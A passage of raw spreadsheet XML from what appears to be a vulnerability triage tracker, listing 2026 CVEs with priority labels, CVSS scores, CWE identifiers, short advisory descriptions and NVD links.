t="inlineStr" /><c r="Q198" s="5" t="inlineStr"><is><t>CWE-94</t></is></c><c r="R198" s="5" t="inlineStr"><is><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is></c><c r="S198" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-55511</t></is></c></row><row r="199"><c r="A199" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B199" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C199" s="5" t="inlineStr"><is><t>CVE-2026-62646</t></is></c><c r="D199" s="5" t="n"><v>9.1</v></c><c r="E199" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F199" s="5" t="inlineStr"><is><t>productcert@siemens.com</t></is></c><c r="G199" s="5" t="inlineStr" /><c r="H199" s="5" t="n"><v>0.003</v></c><c r="I199" s="5" t="inlineStr" /><c r="J199" s="5" t="inlineStr" /><c r="K199" s="5" t="inlineStr" /><c r="L199" s="5" t="inlineStr" /><c r="M199" s="5" t="inlineStr" /><c r="N199" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O199" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P199" s="5" t="inlineStr" /><c r="Q199" s="5" t="inlineStr"><is><t>CWE-331</t></is></c><c r="R199" s="5" t="inlineStr"><is><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is></c><c r="S199" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62646</t></is></c></row><row r="200"><c r="A200" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B200" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C200" s="5" t="inlineStr"><is><t>CVE-2026-69641</t></is></c><c r="D200" s="5" t="n"><v>9.1</v></c><c r="E200" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F200" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G200" s="5" t="inlineStr" /><c r="H200" s="5" t="n"><v>0.008</v></c><c r="I200" s="5" t="inlineStr" /><c r="J200" s="5" t="inlineStr" /><c r="K200" s="5" t="inlineStr" /><c r="L200" s="5" t="inlineStr" /><c r="M200" s="5" t="inlineStr" /><c r="N200" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O200" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P200" s="5" t="inlineStr" /><c r="Q200" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="R200" s="5" t="inlineStr"><is><t>Missing authorization in Microsoft Exchange Server allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="S200" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69641</t></is></c></row><row r="201"><c r="A201" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B201" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C201" s="5" t="inlineStr"><is><t>CVE-2026-73309</t></is></c><c r="D201" s="5" t="n"><v>9.1</v></c><c r="E201" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F201" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G201" s="5" t="inlineStr" /><c r="H201" s="5" t="n"><v>0.005</v></c><c r="I201" s="5" t="inlineStr" /><c r="J201" s="5" t="inlineStr" /><c r="K201" s="5" t="inlineStr"><is><t>xenforo:xenforo</t></is></c><c r="L201" s="5" t="inlineStr" /><c r="M201" s="5" t="inlineStr" /><c r="N201" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O201" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P201" s="5" t="inlineStr" /><c r="Q201" s="5" t="inlineStr"><is><t>CWE-697</t></is></c><c r="R201" s="5" t="inlineStr"><is><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is></c><c r="S201" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73309</t></is></c></row><row r="202"><c r="A202" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B202" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C202" s="5" t="inlineStr"><is><t>CVE-2026-73311</t></is></c><c r="D202" s="5" t="n"><v>9.1</v></c><c r="E202" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F202" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G202" s="5" t="inlineStr" /><c r="H202" s="5" t="n"><v>0.004</v></c><c r="I202" s="5" t="inlineStr" /><c r="J202" s="5" t="inlineStr" /><c r="K202" s="5" t="inlineStr"><is><t>xenforo:xenforo</t></is></c><c r="L202" s="5" t="inlineStr" /><c r="M202" s="5" t="inlineStr" /><c r="N202" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O202" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P202" s="5" t="inlineStr" /><c r="Q202" s="5" t="inlineStr"><is><t>CWE-294</t></is></c><c r="R202" s="5" t="inlineStr"><is><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is></c><c r="S202" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73311</t></is></c></row><row r="203"><c r="A203" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B203" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C203" s="5" t="inlineStr"><is><t>CVE-2026-73312</t></is></c><c r="D203" s="5" t="n"><v>9.1</v></c><c r="E203" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F203" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G203" s="5" t="inlineStr" /><c r="H203" s="5" t="n"><v>0.004</v></c><c r="I203" s="5" t="inlineStr" /><c r="J203" s="5" t="inlineStr" /><c r="K203" s="5" t="inlineStr"><is><t>xenforo:xenforo</t></is></c><c r="L203" s="5" t="inlineStr" /><c r="M203" s="5" t="inlineStr" /><c r="N203" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O203" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P203" s="5" t="inlineStr" /><c r="Q203" s="5" t="inlineStr"><is><t>CWE-294</t></is></c><c r="R203" s="5" t="inlineStr"><is><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is></c><c r="S203" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73312</t></is></c></row><row r="204"><c r="A204" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B204" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C204" s="5" t="inlineStr"><is><t>CVE-2026-73475</t></is></c><c r="D204" s="5" t="n"><v>9.1</v></c><c r="E204" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F204" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G204" s="5" t="inlineStr" /><c r="H204" s="5" t="n"><v>0.002</v></c><c r="I204" s="5" t="inlineStr" /><c r="J204" s="5" t="inlineStr" /><c r="K204" s="5" t="inlineStr"><is><t>centarro:commerce_paypal</t></is></c><c r="L204" s="5" t="inlineStr" /><c r="M204" s="5" t="inlineStr" /><c r="N204" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O204" s="5" t="inlineStr"><is><t>2026-09-02</t></is></c><c r="P204" s="5" t="inlineStr" /><c r="Q204" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="R204" s="5" t="inlineStr"><is><t>Incorrect Authorization vulnerability in Drupal Commerce PayPal allows Forceful Browsing. This issue affects Commerce PayPal versions: from 0.0.0 to 1.12.0, from 2.0.0 to 2.1.3.</t></is></c><c r="S204" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73475</t></is></c></row><row r="205"><c r="A205" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B205" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C205" s="5" t="inlineStr"><is><t>CVE-2026-75156</t></is></c><c r="D205" s="5" t="n"><v>9.1</v></c><c r="E205" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F205" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G205" s="5" t="inlineStr" /><c r="H205" s="5" t="n"><v>0.002</v></c><c r="I205" s="5" t="inlineStr" /><c r="J205" s="5" t="inlineStr" /><c r="K205" s="5" t="inlineStr" /><c r="L205" s="5" t="inlineStr" /><c r="M205" s="5" t="inlineStr" /><c r="N205" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O205" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P205" s="5" t="inlineStr" /><c r="Q205" s="5" t="inlineStr"><is><t>CWE-346</t></is></c><c r="R205" s="5" t="inlineStr"><is><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is></c><c r="S205" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75156</t></is></c></row><row r="206"><c r="A206" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B206" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C206" s="5" t="inlineStr"><is><t>CVE-2026-75160</t></is></c><c r="D206" s="5" t="n"><v>9.1</v></c><c r="E206" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F206" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G206" s="5" t="inlineStr" /><c r="H206" s="5" t="n"><v>0.004</v></c><c r="I206" s="5" t="inlineStr" /><c r="J206" s="5" t="inlineStr" /><c r="K206" s="5" t="inlineStr" /><c r="L206" s="5" t="inlineStr" /><c r="M206" s="5" t="inlineStr" /><c r="N206" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O206" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P206" s="5" t="inlineStr" /><c r="Q206" s="5" t="inlineStr"><is><t>CWE-269</t></is></c><c r="R206" s="5" t="inlineStr"><is><t>An issue in X-Serie Gateway Firmware V6_00_05 allows a remote attacker to escalate privileges via the endpoints /cgi-bin/wwwugw.cgi and /cgi-bin/ugwdownload.cgi.</t></is></c><c r="S206" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75160</t></is></c></row><row r="207"><c r="A207" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B207" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C207" s="5" t="inlineStr"><is><t>CVE-2026-75431</t></is></c><c r="D207" s="5" t="n"><v>9.1</v></c><c r="E207" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F207" s="5" t="inlineStr"><is><t>cve@mitre.org</t></is></c><c r="G207" s="5" t="inlineStr" /><c r="H207" s="5" t="n"><v>0.008</v></c><c r="I207" s="5" t="inlineStr" /><c r="J207" s="5" t="inlineStr" /><c r="K207" s="5" t="inlineStr" /><c r="L207" s="5" t="inlineStr" /><c r="M207" s="5" t="inlineStr" /><c r="N207" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O207" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P207" s="5" t="inlineStr" /><c r="Q207" s="5" t="inlineStr"><is><t>CWE-321</t></is></c><c r="R207" s="5" t="inlineStr"><is><t>PowerJob Server version 5.1.2 (and likely earlier) uses a predictable JWT signing key for HS256-based authentication. This allows a remote attacker to execute arbitrary code.</t></is></c><c r="S207" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75431</t></is></c></row><row r="208"><c r="A208" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B208" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C208" s="5" t="inlineStr"><is><t>CVE-2026-75595</t></is></c><c r="D208" s="5" t="n"><v>9.1</v></c><c r="E208" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F208" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G208" s="5" t="inlineStr" /><c r="H208" s="5" t="n"><v>0.003</v></c><c r="I208" s="5" t="inlineStr" /><c r="J208" s="5" t="inlineStr" /><c r="K208" s="5" t="inlineStr" /><c r="L208" s="5" t="inlineStr"><is><t>maven:io.netty:netty-handler</t></is></c><c r="M208" s="5" t="inlineStr"><is><t>4.1.137.Final, 4.2.17.Final</t></is></c><c r="N208" s="5" t="inlineStr"><is><t>GHSA, OSV</t></is></c><c r="O208" s="5" t="inlineStr" /><c r="P208" s="5" t="inlineStr" /><c r="Q208" s="5" t="inlineStr"><is><t>CWE-475, CWE-754</t></is></c><c r="R208"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S208" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75595</t></is></c></row><row r="209"><c r="A209" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B209" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C209" s="5" t="inlineStr"><is><t>CVE-2026-75746</t></is></c><c r="D209" s="5" t="n"><v>9.1</v></c><c r="E209" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F209" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G209" s="5" t="inlineStr" /><c r="H209" s="5" t="n"><v>0.011</v></c><c r="I209" s="5" t="inlineStr" /><c r="J209" s="5" t="inlineStr" /><c r="K209" s="5" t="inlineStr" /><c r="L209" s="5" t="inlineStr" /><c r="M209" s="5" t="inlineStr" /><c r="N209" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O209" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P209" s="5" t="inlineStr" /><c r="Q209" s="5" t="inlineStr"><is><t>CWE-89</t></is></c><c r="R209" s="5" t="inlineStr"><is><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is></c><c r="S209" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75746</t></is></c></row><row r="210"><c r="A210" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B210" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C210" s="5" t="inlineStr"><is><t>CVE-2026-78327</t></is></c><c r="D210" s="5" t="n"><v>9.1</v></c><c r="E210" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F210" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G210" s="5" t="inlineStr" /><c r="H210" s="5" t="n"><v>0.016</v></c><c r="I210" s="5" t="inlineStr" /><c r="J210" s="5" t="inlineStr" /><c r="K210" s="5" t="inlineStr" /><c r="L210" s="5" t="inlineStr" /><c r="M210" s="5" t="inlineStr" /><c r="N210" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O210" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P210" s="5" t="inlineStr" /><c r="Q210" s="5" t="inlineStr"><is><t>CWE-78</t></is></c><c r="R210" s="5" t="inlineStr"><is><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is></c><c r="S210" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78327</t></is></c></row><row r="211"><c r="A211" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B211" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C211" s="5" t="inlineStr"><is><t>CVE-2026-78328</t></is></c><c r="D211" s="5" t="n"><v>9.1</v></c><c r="E211" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F211" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G211" s="5" t="inlineStr" /><c r="H211" s="5" t="n"><v>0.005</v></c><c r="I211" s="5" t="inlineStr" /><c r="J211" s="5" t="inlineStr" /><c r="K211" s="5" t="inlineStr" /><c r="L211" s="5" t="inlineStr" /><c r="M211" s="5" t="inlineStr" /><c r="N211" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O211" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P211" s="5" t="inlineStr" /><c r="Q211" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="R211" s="5" t="inlineStr"><is><t>A missing authorization vulnerability in the SonicWall Network Security Manager (NSM) On-Prem Management interface allows a lower-privileged Admin user to escalate privileges to SuperAdmin.</t></is></c><c r="S211" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78328</t></is></c></row><row r="212"><c r="A212" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B212" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C212" s="5" t="inlineStr"><is><t>CVE-2026-79571</t></is></c><c r="D212" s="5" t="n"><v>9.1</v></c><c r="E212" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F212" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G212" s="5" t="inlineStr" /><c r="H212" s="5" t="n"><v>0.003</v></c><c r="I212" s="5" t="inlineStr" /><c r="J212" s="5" t="inlineStr"><is><t>spring</t></is></c><c r="K212" s="5" t="inlineStr" /><c r="L212" s="5" t="inlineStr" /><c r="M212" s="5" t="inlineStr" /><c r="N212" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O212" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P212" s="5" t="inlineStr" /><c r="Q212" s="5" t="inlineStr"><is><t>CWE-284</t></is></c><c r="R212" s="5" t="inlineStr"><is><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is></c><c r="S212" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79571</t></is></c></row><row r="213"><c r="A213" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B213" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C213" s="5" t="inlineStr"><is><t>CVE-2026-80181</t></is></c><c r="D213" s="5" t="n"><v>9.1</v></c><c r="E213" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F213" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G213" s="5" t="inlineStr" /><c r="H213" s="5" t="n"><v>0.004</v></c><c r="I213" s="5" t="inlineStr" /><c r="J213" s="5" t="inlineStr" /><c r="K213" s="5" t="inlineStr" /><c r="L213" s="5" t="inlineStr" /><c r="M213" s="5" t="inlineStr" /><c r="N213" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O213" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P213" s="5" t="inlineStr" /><c r="Q213" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="R213" s="5" t="inlineStr"><is><t>Apache Allura's webhooks are vulnerable to Server-Side Request Forgery (SSRF).




This issue affects Apache Allura: through 1.20.0.



Users are recommended to upgrade to version 1.21.0, which fixes the issue.</t></is></c><c r="S213" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80181</t></is></c></row><row r="214"><c r="A214" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B214" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C214" s="5" t="inlineStr"><is><t>CVE-2026-81939</t></is></c><c r="D214" s="5" t="n"><v>9.1</v></c><c r="E214" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F214" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G214" s="5" t="inlineStr" /><c r="H214" s="5" t="n"><v>0.007</v></c><c r="I214" s="5" t="inlineStr" /><c r="J214" s="5" t="inlineStr" /><c r="K214" s="5" t="inlineStr" /><c r="L214" s="5" t="inlineStr" /><c r="M214" s="5" t="inlineStr" /><c r="N214" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O214" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P214" s="5" t="inlineStr" /><c r="Q214" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="R214" s="5" t="inlineStr"><is><t>A Zip Slip vulnerability in the SonicWall Network Security Manager (NSM) On-Prem file upload and archive processing functionality allows an attacker to extract files outside the intended destination directory using a specially crafted archive.</t></is></c><c r="S214" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81939</t></is></c></row><row r="215"><c r="A215" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B215" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C215" s="5" t="inlineStr"><is><t>CVE-2026-85043</t></is></c><c r="D215" s="5" t="n"><v>9.1</v></c><c r="E215" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F215" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G215" s="5" t="inlineStr" /><c r="H215" s="5" t="n"><v>0.003</v></c><c r="I215" s="5" t="inlineStr" /><c r="J215" s="5" t="inlineStr" /><c r="K215" s="5" t="inlineStr"><is><t>google:chrome</t></is></c><c r="L215" s="5" t="inlineStr" /><c r="M215" s="5" t="inlineStr" /><c r="N215" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O215" s="5" t="inlineStr"><is><t>2026-09-03</t></is></c><c r="P215" s="5" t="inlineStr" /><c r="Q215" s="5" t="inlineStr"><is><t>CWE-459</t></is></c><c r="R215" s="5" t="inlineStr"><is><t>Incomplete cleanup in Network in Google Chrome prior to 152.0.7977.82 allowed a remote attacker to bypass system access restrictions via crafted network traffic. (Chromium security severity: High)</t></is></c><c r="S215" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85043</t></is></c></row><row r="216"><c r="A216" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B216" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C216" s="5" t="inlineStr"><is><t>CVE-2026-86729</t></is></c><c r="D216" s="5" t="n"><v>9.1</v></c><c r="E216" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F216" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G216" s="5" t="inlineStr" /><c r="H216" s="5" t="n"><v>0.002</v></c><c r="I216" s="5" t="inlineStr" /><c r="J216" s="5" t="inlineStr" /><c r="K216" s="5" t="inlineStr" /><c r="L216" s="5" t="inlineStr" /><c r="M216" s="5" t="inlineStr" /><c r="N216" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O216" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P216" s="5" t="inlineStr" /><c r="Q216" s="5" t="inlineStr"><is><t>CWE-307</t></is></c><c r="R216" s="5" t="inlineStr"><is><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is></c><c r="S216" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86729</t></is></c></row><row r="217"><c r="A217" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B217" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C217" s="5" t="inlineStr"><is><t>CVE-2026-86840</t></is></c><c r="D217" s="5" t="n"><v>9.1</v></c><c r="E217" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F217" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G217" s="5" t="inlineStr" /><c r="H217" s="5" t="n"><v>0.002</v></c><c r="I217" s="5" t="inlineStr" /><c r="J217" s="5" t="inlineStr" /><c r="K217" s="5" t="inlineStr" /><c r="L217" s="5" t="inlineStr" /><c r="M217" s="5" t="inlineStr" /><c r="N217" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O217" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P217" s="5" t="inlineStr" /><c r="Q217" s="5" t="inlineStr"><is><t>CWE-639, CWE-862</t></is></c><c r="R217" s="5" t="inlineStr"><is><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is></c><c r="S217" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86840</t></is></c></row><row r="218"><c r="A218" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B218" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C218" s="5" t="inlineStr"><is><t>CVE-2026-53581</t></is></c><c r="D218" s="5" t="n"><v>9</v></c><c r="E218" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F218" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G218" s="5" t="inlineStr" /><c r="H218" s="5" t="n"><v>0.003</v></c><c r="I218" s="5" t="inlineStr" /><c r="J218" s="5" t="inlineStr" /><c r="K218" s="5" t="inlineStr" /><c r="L218" s="5" t="inlineStr" /><c r="M218" s="5" t="inlineStr" /><c r="N218" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O218" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P218" s="5" t="inlineStr" /><c r="Q218" s="5" t="inlineStr"><is><t>CWE-22, CWE-73</t></is></c><c r="R218" s="5" t="inlineStr"><is><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is></c><c r="S218" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-53581</t></is></c></row><row r="219"><c r="A219" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B219" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C219" s="5" t="inlineStr"><is><t>CVE-2026-66768</t></is></c><c r="D219" s="5" t="n"><v>9</v></c><c r="E219" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F219" s="5" t="inlineStr"><is><t>cna@sap.com</t></is></c><c r="G219" s="5" t="inlineStr" /><c r="H219" s="5" t="n"><v>0.003</v></c><c r="I219" s="5" t="inlineStr" /><c r="J219" s="5" t="inlineStr"><is><t>sap</t></is></c><c r="K219" s="5" t="inlineStr" /><c r="L219" s="5" t="inlineStr" /><c r="M219" s="5" t="inlineStr" /><c r="N219" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O219" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P219" s="5" t="inlineStr" /><c r="Q219" s="5" t="inlineStr"><is><t>CWE-807</t></is></c><c r="R219" s="5" t="inlineStr"><is><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is></c><c r="S219" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-66768</t></is></c></row><row r="220"><c r="A220" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B220" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C220" s="5" t="inlineStr"><is><t>CVE-2026-69854</t></is></c><c r="D220" s="5" t="n"><v>9</v></c><c r="E220" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F220" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G220" s="5" t="inlineStr" /><c r="H220" s="5" t="n"><v>0.006</v></c><c r="I220" s="5" t="inlineStr" /><c r="J220" s="5" t="inlineStr"><is><t>spring</t></is></c><c r="K220" s="5" t="inlineStr" /><c r="L220" s="5" t="inlineStr" /><c r="M220" s="5" t="inlineStr" /><c r="N220" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O220" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P220" s="5" t="inlineStr" /><c r="Q220" s="5" t="inlineStr"><is><t>CWE-287</t></is></c><c r="R220" s="5" t="inlineStr"><is><t>Improper authentication in Spring Cloud Azure allows an unauthorized attacker to elevate privileges over a network.</t></is></c><c r="S220" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69854</t></is></c></row><row r="221"><c r="A221" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B221" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C221" s="5" t="inlineStr"><is><t>CVE-2026-82021</t></is></c><c r="D221" s="5" t="n"><v>9</v></c><c r="E221" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F221" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G221" s="5" t="inlineStr" /><c r="H221" s="5" t="n"><v>0.002</v></c><c r="I221" s="5" t="inlineStr" /><c r="J221" s="5" t="inlineStr" /><c r="K221" s="5" t="inlineStr" /><c r="L221" s="5" t="inlineStr" /><c r="M221" s="5" t="inlineStr" /><c r="N221" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O221" s="5" t="inlineStr"><is><t>2026-08-28</t></is></c><c r="P221" s="5" t="inlineStr" /><c r="Q221" s="5" t="inlineStr"><is><t>CWE-494</t></is></c><c r="R221" s="5" t="inlineStr"><is><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is></c><c r="S221" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82021</t></is></c></row><row r="222"><c r="A222" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B222" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C222" s="5" t="inlineStr"><is><t>CVE-2026-85982</t></is></c><c r="D222" s="5" t="n"><v>9</v></c><c r="E222" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F222" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G222" s="5" t="inlineStr" /><c r="H222" s="5" t="n"><v>0.002</v></c><c r="I222" s="5" t="inlineStr" /><c r="J222" s="5" t="inlineStr" /><c r="K222" s="5" t="inlineStr" /><c r="L222" s="5" t="inlineStr" /><c r="M222" s="5" t="inlineStr" /><c r="N222" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O222" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P222" s="5" t="inlineStr" /><c r="Q222" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="R222" s="5" t="inlineStr"><is><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is></c><c r="S222" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85982</t></is></c></row><row r="223"><c r="A223" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B223" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C223" s="5" t="inlineStr"><is><t>CVE-2025-30156</t></is></c><c r="D223" s="5" t="n"><v>8.9</v></c><c r="E223" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F223" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G223" s="5" t="inlineStr" /><c r="H223" s="5" 